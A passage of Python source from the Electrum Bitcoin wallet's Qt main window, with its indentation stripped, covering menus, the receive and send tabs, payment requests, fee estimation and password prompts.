raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mBTC'
if self.decimal_point == 8:
return 'BTC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return self.create_list_tab(l, l.get_list_header())
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
displayed_feerate = displayed_feerate // 1000 if displayed_feerate else 0
displayed_fee = displayed_feerate * size
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(feerounding)
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(bool(feerounding))
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
